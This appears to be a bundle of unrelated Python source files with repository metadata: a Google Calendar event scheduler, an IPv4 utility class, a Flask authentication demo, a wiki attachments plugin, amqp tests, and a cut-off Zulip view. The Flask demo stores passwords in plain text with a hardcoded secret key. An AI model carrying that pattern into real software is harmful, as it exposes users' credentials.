print(event['description'])
# Get the next request object by passing the previous request object to
# the list_next method.
request = service.events().list_next(request, response)
def scheduleEvent(list_schedule, event_data, isevent=True):
'''
Inserts the event into google calendar.
:param:list_schedule list list of dates
:param:event_data dict event data
:param:isevent bool is it event or a manual update? default true (event)
'''
cal_service = useService('calendar')
timezone = 'America/Argentina/Ushuaia'
if not isevent:
event = {}
event['summary'] = "Actualizacion sitio: changelog: " + event_data['start']
event['start'] = {'dateTime': event_data['start'], 'timeZone': timezone}
event['end'] = {'dateTime': event_data['end'], 'timeZone': timezone}
end_date_iso = event_data['end'].isoformat()
event['description'] = event_data['description']
#use recurrence so we dont have to create daily events within same time
tmp_date = end_date_iso + "Z" #doesnt seem to like timezone.
tmp_recurrence = tmp_date.replace("-","").replace(":","")
tmp_recurrence = 'RRULE:FREQ=DAILY;UNTIL=' + tmp_recurrence
event['recurrence'] = [tmp_recurrence]
executeCall(cal_service.events().insert(calendarId=CALENDAR_ID, body=event))
print(" Manual update added")
else:
'''
ifttt ingredients
Title The event's title.
Description The event's description.
Where The location where the event takes place.
Starts ej August 23, 2011 at 10:00PM
Ends ej: August 23, 2011 at 11:00PM
'''
# so dirty
gcal_description = "#{city} {tags} {title} {shortURL}({human_date}{place})"
end_date_iso = event_data['end']['timestamp'].isoformat()
def _fecha_humana(date_time, abbr=False):
""" translate to human dates (spanish, quick and dirty)
Args:
date_time (datetime object)
abbr (boolean) abreviate month names? default False
Returns:
str
"""
tmp = date_time.strftime('%d de //%m//, %H:%M hs')
tmp_month_number = tmp.split("//")[1].split("//")[0]
month = ""
if tmp_month_number == "01":
month = "en." if abbr else "enero"
if tmp_month_number == "02":
month = "febr." if abbr else "febrero"
if tmp_month_number == "03":
month = "mzo." if abbr else "marzo"
if tmp_month_number == "04":
month = "abr." if abbr else "abril"
if tmp_month_number == "05":
month = "my." if abbr else "mayo"
if tmp_month_number == "06":
month = "jun." if abbr else "junio"
if tmp_month_number == "07":
month = "jul." if abbr else "julio"
if tmp_month_number == "08":
month = "agt." if abbr else "agosto"
if tmp_month_number == "09":
month = "sept." if abbr else "septiembre"
if tmp_month_number == "10":
month = "oct." if abbr else "octubre"
if tmp_month_number == "11":
month = "nov." if abbr else "noviembre"
if tmp_month_number == "12":
month = "dic." if abbr else "diciembre"
tmp = tmp.replace("//" + tmp_month_number + "//", month)
return tmp
#cycle list
for date_time in list_schedule:
human_datetime_start = ""
event = {}
tags = ""
city = ""
place = ""
shortURL = ""
if event_data['city'] == "rio-grande":
city = "RioGrande"
else:
city = event_data['city'].title()
#event['reminders'] = dict()
#event['reminders']['useDefault'] = False #remove reminder, this is for myself
event['summary'] = event_data['title']
event['start'] = {'dateTime': date_time[0], 'timeZone': timezone}
event['end'] = {'dateTime': date_time[1], 'timeZone': timezone}
#human_datetime_end = _fecha_humana(event_data['start']['timestamp'], abbr=True) #the real date
human_datetime_end = event_data['start']['timestamp'].strftime('%d/%m, %H:%M hs')
# if not time set, remove the 00:00 added when creating the timestamp
if not event_data['start']['time']:
human_datetime_end = human_datetime_end.replace("00:00 hs","")
#if all day: {'date': eEnd}
print (" schedule from {} to {} until {}".format(
date_time[0].replace("T", " ").replace(":00-03:00","")
,date_time[1].replace("T", " ").replace(":00-03:00","")
, end_date_iso.split("T")[0]
)
)
if not event_data['location'] is "":
event['location'] = event_data['location']
if event['location']:
place = ", en " + event_data['location']
final_summary = event['summary']
tags = ""
if event_data['tags']:
#tags = " #" + event_data['tags'].replace(",", " #")
all_tags = event_data['tags'].split(",")
reminding_tags = list()
# shouldn't be doing this but it's quicker now than using regex
final_summary = " " + final_summary + " "
# and also shouldn't be doing this but we don't want to deal with accented letters
# and the tag stuff...
final_summary = final_summary.replace("ó","o").replace("í","i")
#use part of the title to include tags (saving space)
tmp_tag = ""
for tag in all_tags:
tmp_tag = " " + tag + " "
if tmp_tag.lower() in final_summary.lower():
pattern = re.compile( re.escape(tmp_tag), re.IGNORECASE )
final_summary = pattern.sub(" #" + tag, final_summary)
else:
reminding_tags.append(tag)
final_summary = final_summary.strip()
tags = " #".join(reminding_tags)
tags = "#" + tags
if event_data['short-url']:
shortURL = event_data['short-url'] + " "
event['description'] = gcal_description.format(
city=city, tags=tags, title=final_summary
, human_date=human_datetime_end, place=place
, shortURL=shortURL
)
#use recurrence so we dont have to create daily events within same time
#event['recurrence'] = ['RRULE:FREQ=DAILY;UNTIL=20151007T193000-03:00']
tmp_date = end_date_iso + "Z" #doesnt seem to like timezone.
tmp_recurrence = tmp_date.replace("-","").replace(":","")
tmp_recurrence = 'RRULE:FREQ=DAILY;UNTIL=' + tmp_recurrence
event['recurrence'] = [tmp_recurrence]
#newEvent = cal_service.events().insert(calendarId=CALENDAR_ID, body=event)
executeCall(cal_service.events().insert(calendarId=CALENDAR_ID, body=event)) #or newEvent.execute()
def shortenURL(url):
""" Shortens the URL
Args:
url (str)
Returns:
str: shortened URL
"""
short = executeCall(
useService('url').url().insert(body={'longUrl': url})
)
return short['id']
def executeCall(method):
""" Executes the API method.
Args:
method (google-obhect)
Returns:
unknown: method executed or none if failed
"""
try:
return method.execute()
except HttpError as e:
error = json.loads(e.content)
if error.get('code') == '403' and \
error.get('errors')[0].get('reason') \
in ['rateLimitExceeded', 'userRateLimitExceeded']:
time.sleep((2 ** n) + random.random())
else:
raise
return None
def process_post(path, city, meta=False):
"""Process the post
Args:
path (str)
city (str)
meta (dict) if we got the metadata before
"""
print(" Getting metadata... ", end="")
if not meta:
meta = get_post_metadata(path, city)
print(" done.")
print(" Creating post schedule... ", end="")
post_schedule = create_post_schedule(meta['start']['date'], meta['end']['date'])
print(" done.")
# create google calendar event
print(" Inserting post's schedule in Google Calendar... ")
scheduleEvent(post_schedule, meta)
return True # future proof: if we have an error in some kind
def get_post_metadata(path, city):
"""Get metadata from post
Args:
path (str)
city (str)
Returns:
dictionary
"""
the_post = ""
# date is date-start, but keep it like this (less coding conditionals)
metadata = {
'title':'', 'date':'','date-end':'','city': city
,'tags':'','short-url':'', 'location':'',
'start' : {'date': '', 'time':'', 'timestamp':''},
'end' : {'date': '', 'time':'', 'timestamp':''}
#date = only date, in str: yyyy-mm-dd
#time = only time, in str: hh:mm
#timestamp = datetime, the object
}
keys = list(metadata.keys()) #so we can remove stuff, like city key
keys.remove('city')
with open(path,'r',encoding="utf-8") as tmp:
if YAML:
the_post = tmp.read()
else:
the_post = tmp.readlines()
tmp = ""
if YAML:
# we coud have fake it and told YAML we have many documents
# inside of file (but only having one) but let's not lie
# to the poor thing
'''
for data in yaml.load_all(document):
if data:
print (data['title'])
'''
yaml_doc = yaml.load(the_post.split("---")[1])
for key in keys:
if key in yaml_doc:
if key == "date":
metadata["start"]['date'] = yaml_doc[key]
elif key == "date-end":
metadata["end"]['date'] = yaml_doc[key]
else:
metadata[key] = yaml_doc[key]
if key == "tags":
metadata[key] = ",".join(metadata[key])
else:
yaml_block = 0
for i,line in enumerate(the_post):
if line.startswith("---"):
if yaml_block == 0:
yaml_block = 1
else:
break
tmp_line = line.strip().split(": ", 1)
for key in keys:
if line.startswith(key + ":"):
if not key == "tags":
if metadata[key]:
metadata[key] = tmp_line[1]
if key == "date":
metadata["start"]['date'] = tmp_line[1]
elif key == "date-end":
metadata["end"]['date'] = tmp_line[1]
else:
if tmp_line[1] != "[]":
metadata['tags'] = tmp_line[1].replace("[", "").replace("]","")
#check if location has ID, and if it does, find the proper name
metadata['location'] = find_place_id(city, metadata['location'])
#normalize dates. Use YYYY-MM-DDTHH:MM:SS
if metadata['start'] and " " in str(metadata['start']['date']):
datetime_pieces = metadata['start']['date'].split(" ")
metadata['start']['date'] = datetime_pieces[0]
if datetime_pieces[1] and ":" in datetime_pieces[1]:
metadata['start']['time'] = datetime_pieces[1] + ":00"
datetime_pieces[1] += ":00"
metadata['start']['timestamp'] = "T".join(datetime_pieces)
metadata['start']['timestamp'] = datetime.datetime.strptime(metadata['start']['timestamp'], '%Y-%m-%dT%H:%M:00')
else:
metadata['start']['date'] = str(metadata['start']['date'])
metadata['start']['timestamp'] = datetime.datetime.strptime(metadata['start']['date'], '%Y-%m-%d')
metadata['start']['time'] = ""
if metadata['end'] and " " in str(metadata['end']['date']):
datetime_pieces = metadata['end']['date'].split(" ")
metadata['end']['date'] = datetime_pieces[0]
if datetime_pieces[1] and ":" in datetime_pieces[1]:
metadata['end']['time'] = datetime_pieces[1] + ":00"
datetime_pieces[1] += ":00"
metadata['end']['timestamp'] = "T".join(datetime_pieces)
metadata['end']['timestamp'] = datetime.datetime.strptime(metadata['end']['timestamp'], '%Y-%m-%dT%H:%M:00')
else:
metadata['end']['timestamp'] = metadata['start']['timestamp'] + datetime.timedelta(hours=1)
metadata['end']['date'] = metadata['end']['timestamp'].strftime('%Y-%m-%d')
metadata['end']['time'] = metadata['end']['timestamp'].strftime('%H:%M:00')
#remove temporary keys
del metadata['date']
del metadata['date-end']
return metadata
def get_places_id(city):
'''Get all the places ID with their proper name
:param:city str
:returns: dict where key = place ID, value = place name
'''
city = city.replace("-", "")
current_city_places_folder = PLACES_FOLDER.replace("{ciudad}", city)
current_city_places_folder = os.path.join(ROOT_DIR, current_city_places_folder)
if not os.path.exists(current_city_places_folder):
return False
places = dict()
HTMLTAG_RE = re.compile(r'<[^>]+>') # to remove HTML from name
for root,subdir,files in os.walk(current_city_places_folder):
for archivo in files:
if archivo.startswith("_") or not archivo.endswith(".md"):
continue
#open and get the ID key.
file_path = os.path.join(root,archivo)
with open(file_path, encoding="utf-8") as tmp:
places_file = tmp.read()
tmp = ""
if YAML:
yaml_doc = yaml.load(places_file.split("---")[1])
places[yaml_doc['uid']] = HTMLTAG_RE.sub("", yaml_doc['nombre'])
else:
places_file = places_file.split("---")[1]
places_file = places_file.splitlines()
tmp_name = ""
tmp_id = ""
for i,line in enumerate(places_file):
if line.startswith("uid:"):
tmp_id = line.split("id: ")[1]
if line.startswith("nombre:"):
tmp_name = line.split("nombre: ")[1]
if tmp_id and tmp_name:
places[tmp_id] = HTMLTAG_RE.sub("", tmp_name)
if not tmp_name:
places[tmp_id] = tmp_id
return places
def find_place_id(city,place):
#city = city.replace("-", "")
if PLACES_NAMES[city] is False or not city in PLACES_NAMES:
return place
if place in PLACES_NAMES[city]:
return PLACES_NAMES[city][place]
return place
def create_post_schedule(start_date, end_date):
"""Finds the schedule for posting the event
Args:
start_date (str): when the event starts (YYYY-MM-DD)
end_date (str): when the event ends (YYYY-MM-DD)
Returns:
LIST: list of dates - times
"""
random_minute = str(random.randrange(1,59))
post_schedule = list() #tuples: date,time
#use the start date as the finish date. We don't want courses and the like
#(that span multiple days) into the calendar
try:
date_start = datetime.datetime.strptime(start_date, '%Y-%m-%d') - datetime.timedelta(days=DAYS_BEFORE)
except TypeError:
date_start = start_date - datetime.timedelta(days=DAYS_BEFORE)
if len(random_minute) == 1 and not random_minute.startswith("0"):
random_minute = "0" + random_minute
for hour in HOUR_SCHEDULE:
tmp_start = date_start.strftime('%Y-%m-%d') + "T" + hour + ":" + random_minute + ":00-03:00"
# as we use recurrence, must use the endtime of the first instance!
# read: https://developers.google.com/google-apps/calendar/v3/reference/events/insert
tmp_duration = int(random_minute) + 5
if tmp_duration > 59:
tmp_duration = 59
tmp_end = date_start.strftime('%Y-%m-%d') + "T" + hour + ":" + str(tmp_duration) + ":00-03:00"
post_schedule.append((tmp_start,tmp_end))
return post_schedule
'''
#how many days in between, counts start date as 1
days_between = (date_end + datetime.timedelta(days=1) - date_start).days
for i in range(days_between):
for hour in HOUR_SCHEDULE:
tmp = date_start + datetime.timedelta(days=i)
post_schedule.append(
(tmp.strftime('%Y-%m-%d')),
hour + ":" + random_minute
)
'''
def update_processed_file(list_files):
"""Updates the processed posts file.
Args:
list_files (list): list of paths/strings
"""
#just dirtify it
with open(PROCESSED_POSTS_FILE,'a',encoding="utf-8") as tmp:
tmp.write("\n" + "\n".join(list_files))
# Not yet implemented
def searchEvent(query_text):
event_list = []
work = useService('calendar').events(
).list(calendarId=CALENDAR_ID,
#timeMin=start.isoformat() if start else None,
#timeMax=end.isoformat() if end else None,
q=query_text,
singleEvents=True)
events = executeCall(work)
if not events['items']:
return False
if len(events['items']) == 1:
return events['items'][0]['id']
# if we have more than one event, add to a list and then ask the user
# which one is the correct
for event in events['items']:
event_list.append(
(event['summary'], event['id'])
)
print (" found many entries. please indicate which one you want. ")
print (" type none if it's not any of the following. ")
for i, item in enumerate(event_list):
print(" " + str(i + 1) + ": " + item[0])
answer = ""
while not answer or (int(answer) > len(event_list)):
answer = input("I pick: ")
if answer.lower() == "none":
return False
try:
answer = int(answer)
except ValueError:
answer = ""
return event_list[answer - 1][1]
# Not yet implemented
def edit_event():
query_text = ""
new_date = ""
new_description = ""
new_summary = ""
while not query_text:
query_text = input(" Event to search for: ")
result = searchEvent(query_text)
if not result:
print (" event not found ")
exit()
service = useService("calendar")
#get the event data
event = service.events().get(calendarId=CALENDAR_ID, eventId=result).execute()
what_to_update = ""
print(" What do you want to update? ")
print(" s: start date ")
print(" e: end date ")
print(" t: title ")
print(" l: location ")
while not what_to_update or what_to_update not in ("s","e","t","l"):
what_to_update = input(": ")
# --------------
# start program!
# --------------
PLACES_NAMES = dict()
for city in CITIES:
PLACES_NAMES[city] = dict()
PLACES_NAMES[city] = get_places_id(city)
processed_posts = list()
if __name__ == '__main__':
print (" initiating ... " + PROCESSED_POSTS_FILE)
tmp = get_processed_file()
if tmp:
processed_posts = get_processed_file()
tmp = ""
# ge today's date (only)
timestamp_now = datetime.datetime.today()
# I don't know what i'm doing but it works
today_date = timestamp_now.isoformat(sep=' ').split()[0]
today_date = datetime.datetime.strptime(today_date, '%Y-%m-%d')
if args.site_update:
answer = ""
print ("Doing manual adition to gCal. Remember that this event starts from today and spans "+str(DAYS_SPANS_MANUAL_UPDATE)+" days. ")
while not answer:
answer = input(" description: ")
site_update = {}
site_update['description'] = answer
site_update['start'] = timestamp_now
site_update['end'] = timestamp_now + datetime.timedelta(days=DAYS_SPANS_MANUAL_UPDATE)
scheduleEvent([], site_update, isevent=False)
exit()
for ciudad in CITIES:
print (" \n ::: SCANNING " + ciudad + " :::")
current_folder = os.path.join(ROOT_DIR, ciudad, POST_FOLDER)
for root,subdir,files in os.walk(current_folder):
for archivo in files:
if archivo.startswith("_"):
continue
#filename = os.path.basename(path) #get filename from path
file_path = os.path.join(root,archivo)
#filename is YYYY-MM-DD-slug.md
file_date = "-".join(archivo.split("-")[0:3])
if file_date.split("-")[0] in ("2015", "2016", "2017"):
# Sorry, we dont want the old ones
#print ("\n Skiping (old): " + archivo, end="")
continue
file_line_processed = PROCESSED_POSTS_FILE_LINE.format(ciudad=ciudad,filename=archivo)
file_date = datetime.datetime.strptime(file_date, '%Y-%m-%d')
if file_date < today_date:
print (" Skiping (old): " + archivo)
continue
if file_line_processed in processed_posts:
print (" Skiping (already proccesed): " + archivo)
continue
# prevent new line so we can print on same line later
print (" Processing: " + archivo, end="")
print() #print so we can use newlines for next messages
print (" building: " + file_line_processed)
result = process_post(file_path, ciudad)
# add file to processed file-list
FILES_FOR_PROCESSED_LIST.append(file_line_processed)
print ("\n\n -------------------------------")
print (" updating proccesed file list...")
if len(FILES_FOR_PROCESSED_LIST) > 0:
update_processed_file(FILES_FOR_PROCESSED_LIST)
print ( "\n finished! ")
#listEvents()
|
eikiu/tdf-actividades
|
_admin-scripts/tdf_gcal.py
|
Python
|
cc0-1.0
| 28,476
| 0.034032
|
#!/usr/bin/python
"""nrvr.util.ipaddress - Utilities regarding IP addresses
Class provided by this module is IPAddress.
Works in Linux and Windows.
Idea and first implementation - Leo Baschy <srguiwiz12 AT nrvr DOT com>
Contributor - Nora Baschy
Public repository - https://github.com/srguiwiz/nrvr-commander
Copyright (c) Nirvana Research 2006-2015.
Simplified BSD License"""
import re
class IPAddress(object):
"""Methods for multiple machines on one subnet.
As implemented only supports IPv4."""
octetsRegex = re.compile(r"^\s*([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\s*$")
@classmethod
def asList(cls, ipaddress, rangeCheck=False):
"""For ipaddress="10.123.45.67" return mutable [10, 123, 45, 67].
If already a list, a copy is made and returned."""
if isinstance(ipaddress, basestring):
octetsMatch = IPAddress.octetsRegex.search(ipaddress)
if not octetsMatch:
raise Exception("won't recognize as IP address: {0}".format(ipaddress))
octets = [octetsMatch.group(1),
octetsMatch.group(2),
octetsMatch.group(3),
octetsMatch.group(4)]
for index, octet in enumerate(octets):
octet = int(octet)
if rangeCheck and octet > 255:
raise Exception("won't recognize as IP address because > 255: {0}".format(ipaddress))
octets[index] = octet
return octets
elif isinstance(ipaddress, (int, long)):
octets = []
while ipaddress:
octets.append(ipaddress % 256)
ipaddress /= 256
octets += [0 for i in range(max(4 - len(octets), 0))]
octets.reverse()
return octets
else:
# force making a copy
return list(ipaddress)
@classmethod
def asTuple(cls, ipaddress):
"""For ipaddress="10.123.45.67" return immutable (10, 123, 45, 67)."""
if isinstance(ipaddress, tuple):
return ipaddress
elif isinstance(ipaddress, list):
return tuple(ipaddress)
else:
return tuple(cls.asList(ipaddress))
@classmethod
def asString(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return "10.123.45.67"."""
if isinstance(ipaddress, basestring):
return ipaddress
if isinstance(ipaddress, (int, long)):
ipaddress = cls.asList(ipaddress)
return ".".join(map(str, ipaddress))
@classmethod
def asInteger(cls, ipaddress):
"""For ipaddress=[10, 123, 45, 67] return 175844675.
At the time of this writing, such an integer however is
not accepted as input by other methods of this class."""
octets = cls.asList(ipaddress) # must make a copy
integer = 0
while octets:
integer = 256 * integer + octets.pop(0)
return integer
@classmethod
def bitAnd(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet & otherOctet)
return octets
@classmethod
def bitOr(cls, one, other):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
if not isinstance(other, (list, tuple)):
other = cls.asList(other)
octets = []
for oneOctet, otherOctet in zip(one, other):
octets.append(oneOctet | otherOctet)
return octets
@classmethod
def bitNot(cls, one):
if not isinstance(one, (list, tuple)):
one = cls.asList(one)
octets = []
for oneOctet in one:
octets.append(~oneOctet & 255)
return octets
@classmethod
def nameWithNumber(cls, stem, ipaddress, octets=1, separator="-"):
"""For stem="example" and ipaddress="10.123.45.67" return "example-067".
If octets=2 return "example-045-067"."""
name = stem
ipaddress = IPAddress.asTuple(ipaddress)
if not separator:
# empty string instead of e.g. None
separator = ""
for index in range(-octets, 0):
# create leading zeros, e.g. from "19" to "019"
name += separator + "%03d" % ipaddress[index]
return name
@classmethod
def numberWithinSubnet(cls, oneInSubnet, otherNumber, netmask="255.255.255.0"):
"""For oneInSubnet="10.123.45.67" and otherNumber="89" return [10, 123, 45, 89].
For oneInSubnet="10.123.45.67" and otherNumber="89.34" and netmask="255.255.0.0" return [10, 123, 89, 34]."""
if not isinstance(oneInSubnet, (list, tuple)):
oneInSubnet = cls.asList(oneInSubnet)
# less than stellar decoding of otherNumber, but it works in actual use cases
if isinstance(otherNumber, int):
# in theory handling more than 16 bits' 65536 would be desirable,
# practically handling up to 16 bits' 65535 is enough
if otherNumber <= 255:
otherNumber = [otherNumber]
else:
otherNumber = [otherNumber >> 8, otherNumber & 255]
if not isinstance(otherNumber, (list, tuple)):
otherNumber = otherNumber.split(".")
otherNumber = map(int, otherNumber)
if not isinstance(netmask, (list, tuple)):
netmask = cls.asList(netmask)
complementOfNetmask = cls.bitNot(netmask)
contributedBySubnet = cls.bitAnd(oneInSubnet, netmask)
otherNumber = [0] * (len(contributedBySubnet) - len(otherNumber)) + otherNumber
contributedByNumber = cls.bitAnd(otherNumber, complementOfNetmask)
result = cls.bitOr(contributedBySubnet, contributedByNumber)
return result
if __name__ == "__main__":
print IPAddress.asList("10.123.45.67")
print IPAddress.asList((192, 168, 95, 17))
print IPAddress.asList([192, 168, 95, 17])
print IPAddress.asList(175844675)
print IPAddress.asTuple("10.123.45.67")
print IPAddress.asTuple([192, 168, 95, 17])
print IPAddress.asTuple((192, 168, 95, 17))
print IPAddress.asTuple(175844675)
print IPAddress.asString([192, 168, 95, 17])
print IPAddress.asString((192, 168, 95, 17))
print IPAddress.asString("10.123.45.67")
print IPAddress.asString(175844675)
print IPAddress.asInteger("10.123.45.67")
print IPAddress.asInteger([10,123,45,67])
print IPAddress.bitAnd("10.123.45.67", "255.255.255.0")
print IPAddress.bitOr(IPAddress.bitAnd("10.123.45.67", "255.255.255.0"), "0.0.0.1")
print IPAddress.bitNot("1.2.3.4")
print IPAddress.nameWithNumber("example", "10.123.45.67")
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=2)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=3)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=4)
print IPAddress.numberWithinSubnet("10.123.45.67", "89")
print IPAddress.numberWithinSubnet("10.123.45.67", 89)
print IPAddress.numberWithinSubnet("10.123.45.67", "89.34", netmask="255.255.0.0")
print IPAddress.numberWithinSubnet("10.123.45.67", 22818, netmask="255.255.0.0")
|
srguiwiz/nrvr-commander
|
src/nrvr/util/ipaddress.py
|
Python
|
bsd-2-clause
| 7,449
| 0.003088
|
from flask import Flask, url_for, redirect, render_template, request
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import superadmin, login, wtf
from flask.ext.superadmin.contrib import sqlamodel
from wtforms.fields import TextField, PasswordField
from wtforms.validators import Required, ValidationError
# Create application
app = Flask(__name__)
# Create dummy secrey key so we can use sessions
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Create user model. For simplicity, it will store passwords in plain text.
# Obviously that's not right thing to do in real world application.
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
login = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120))
password = db.Column(db.String(64))
# Flask-Login integration
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
# Required for administrative interface
def __unicode__(self):
return self.login
# Define login and registration forms (for flask-login)
class LoginForm(wtf.Form):
login = TextField(validators=[Required()])
password = PasswordField(validators=[Required()])
def validate_login(self, field):
user = self.get_user()
if user is None:
raise ValidationError('Invalid user')
if user.password != self.password.data:
raise ValidationError('Invalid password')
def get_user(self):
return db.session.query(User).filter_by(login=self.login.data).first()
class RegistrationForm(wtf.Form):
login = TextField(validators=[Required()])
email = TextField()
password = PasswordField(validators=[Required()])
def validate_login(self, field):
if db.session.query(User).filter_by(login=self.login.data).count() > 0:
raise ValidationError('Duplicate username')
# Initialize flask-login
def init_login():
login_manager = login.LoginManager()
login_manager.setup_app(app)
# Create user loader function
@login_manager.user_loader
def load_user(user_id):
return db.session.query(User).get(user_id)
# Create customized model view class
class MyModelView(sqlamodel.ModelView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Create customized index view class
class MyAdminIndexView(superadmin.AdminIndexView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Flask views
@app.route('/')
def index():
return render_template('index.html', user=login.current_user)
@app.route('/login/', methods=('GET', 'POST'))
def login_view():
form = LoginForm(request.form)
if form.validate_on_submit():
user = form.get_user()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/register/', methods=('GET', 'POST'))
def register_view():
form = RegistrationForm(request.form)
if form.validate_on_submit():
user = User()
form.populate_obj(user)
db.session.add(user)
db.session.commit()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/logout/')
def logout_view():
login.logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
# Initialize flask-login
init_login()
# Create admin
admin = superadmin.Admin(app, 'Auth', index_view=MyAdminIndexView())
# Add view
admin.add_view(MyModelView(User, db.session))
# Create DB
db.create_all()
# Start app
app.debug = True
app.run()
|
syrusakbary/Flask-SuperAdmin
|
examples/auth/auth.py
|
Python
|
bsd-3-clause
| 3,960
| 0.000253
|
# -*- coding: utf-8 -*-
from django.conf.urls.defaults import patterns, url
from django.utils.translation import ugettext_lazy as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from wiki.plugins.attachments import views
from wiki.plugins.attachments import models
from wiki.plugins.attachments import settings
from wiki.plugins.attachments.markdown_extensions import AttachmentExtension
from wiki.plugins.notifications import ARTICLE_EDIT
class AttachmentPlugin(BasePlugin):
#settings_form = 'wiki.plugins.notifications.forms.SubscriptionForm'
slug = settings.SLUG
urlpatterns = patterns('',
url(r'^$', views.AttachmentView.as_view(), name='attachments_index'),
url(r'^search/$', views.AttachmentSearchView.as_view(), name='attachments_search'),
url(r'^add/(?P<attachment_id>\d+)/$', views.AttachmentAddView.as_view(), name='attachments_add'),
url(r'^replace/(?P<attachment_id>\d+)/$', views.AttachmentReplaceView.as_view(), name='attachments_replace'),
url(r'^history/(?P<attachment_id>\d+)/$', views.AttachmentHistoryView.as_view(), name='attachments_history'),
url(r'^download/(?P<attachment_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^delete/(?P<attachment_id>\d+)/$', views.AttachmentDeleteView.as_view(), name='attachments_delete'),
url(r'^download/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^change/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentChangeRevisionView.as_view(), name='attachments_revision_change'),
)
article_tab = (_(u'Attachments'), "icon-file")
article_view = views.AttachmentView().dispatch
# List of notifications to construct signal handlers for. This
# is handled inside the notifications plugin.
notifications = [{'model': models.AttachmentRevision,
'message': lambda obj: (_(u"A file was changed: %s") if not obj.deleted else _(u"A file was deleted: %s")) % obj.get_filename(),
'key': ARTICLE_EDIT,
'created': True,
'get_article': lambda obj: obj.attachment.article}
]
markdown_extensions = [AttachmentExtension()]
def __init__(self):
#print "I WAS LOADED!"
pass
registry.register(AttachmentPlugin)
|
GbalsaC/bitnamiP
|
django-wiki/wiki/plugins/attachments/wiki_plugin.py
|
Python
|
agpl-3.0
| 2,509
| 0.008768
|
from __future__ import absolute_import, unicode_literals
from case import Mock, patch
from amqp.five import text_t
from amqp.utils import (NullHandler, bytes_to_str, coro, get_errno, get_logger,
str_to_bytes)
class test_get_errno:
def test_has_attr(self):
exc = KeyError('foo')
exc.errno = 23
assert get_errno(exc) == 23
def test_in_args(self):
exc = KeyError(34, 'foo')
exc.args = (34, 'foo')
assert get_errno(exc) == 34
def test_args_short(self):
exc = KeyError(34)
assert not get_errno(exc)
def test_no_args(self):
assert not get_errno(object())
class test_coro:
def test_advances(self):
@coro
def x():
yield 1
yield 2
it = x()
assert next(it) == 2
class test_str_to_bytes:
def test_from_unicode(self):
assert isinstance(str_to_bytes(u'foo'), bytes)
def test_from_bytes(self):
assert isinstance(str_to_bytes(b'foo'), bytes)
def test_supports_surrogates(self):
bytes_with_surrogates = '\ud83d\ude4f'.encode('utf-8', 'surrogatepass')
assert str_to_bytes(u'\ud83d\ude4f') == bytes_with_surrogates
class test_bytes_to_str:
def test_from_unicode(self):
assert isinstance(bytes_to_str(u'foo'), text_t)
def test_from_bytes(self):
assert bytes_to_str(b'foo')
def test_support_surrogates(self):
assert bytes_to_str(u'\ud83d\ude4f') == u'\ud83d\ude4f'
class test_NullHandler:
def test_emit(self):
NullHandler().emit(Mock(name='record'))
class test_get_logger:
def test_as_str(self):
with patch('logging.getLogger') as getLogger:
x = get_logger('foo.bar')
getLogger.assert_called_with('foo.bar')
assert x is getLogger()
def test_as_logger(self):
with patch('amqp.utils.NullHandler') as _NullHandler:
m = Mock(name='logger')
m.handlers = None
x = get_logger(m)
assert x is m
x.addHandler.assert_called_with(_NullHandler())
|
pexip/os-python-amqp
|
t/unit/test_utils.py
|
Python
|
lgpl-2.1
| 2,126
| 0
|
from __future__ import absolute_import
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.db import connection
from django.db.models import Q
from zerver.decorator import authenticated_api_view, authenticated_json_post_view, \
has_request_variables, REQ, JsonableError, \
to_non_negative_int, to_non_negative_float
from django.utils.html import escape as escape_html
from django.views.decorators.csrf import csrf_exempt
from zerver.lib import bugdown
from zerver.lib.actions import recipient_for_emails, do_update_message_flags, \
compute_mit_user_fullname, compute_irc_user_fullname, compute_jabber_user_fullname, \
create_mirror_user_if_needed, check_send_message, do_update_message, \
extract_recipients
from zerver.lib.cache import generic_bulk_cached_fetch
from zerver.lib.query import last_n
from zerver.lib.response import json_success, json_error
from zerver.lib.utils import statsd
from zerver.lib.validator import \
check_list, check_int, check_dict, check_string, check_bool
from zerver.models import Message, UserProfile, Stream, Subscription, \
Recipient, UserMessage, bulk_get_recipients, get_recipient, \
get_user_profile_by_email, get_stream, valid_stream_name, \
parse_usermessage_flags, to_dict_cache_key_id, extract_message_dict, \
stringify_message_dict, \
resolve_email_to_domain, get_realm, get_active_streams, \
bulk_get_streams
import sqlalchemy
from sqlalchemy import func
from sqlalchemy.sql import select, join, column, literal_column, literal, and_, \
or_, not_, union_all, alias
import re
import ujson
from zerver.lib.rest import rest_dispatch as _rest_dispatch
rest_dispatch = csrf_exempt((lambda request, *args, **kwargs: _rest_dispatch(request, globals(), *args, **kwargs)))
# This is a Pool that doesn't close connections. Therefore it can be used with
# existing Django database connections.
class NonClosingPool(sqlalchemy.pool.NullPool):
def status(self):
return "NonClosingPool"
def _do_return_conn(self, conn):
pass
def recreate(self):
return self.__class__(creator=self._creator,
recycle=self._recycle,
use_threadlocal=self._use_threadlocal,
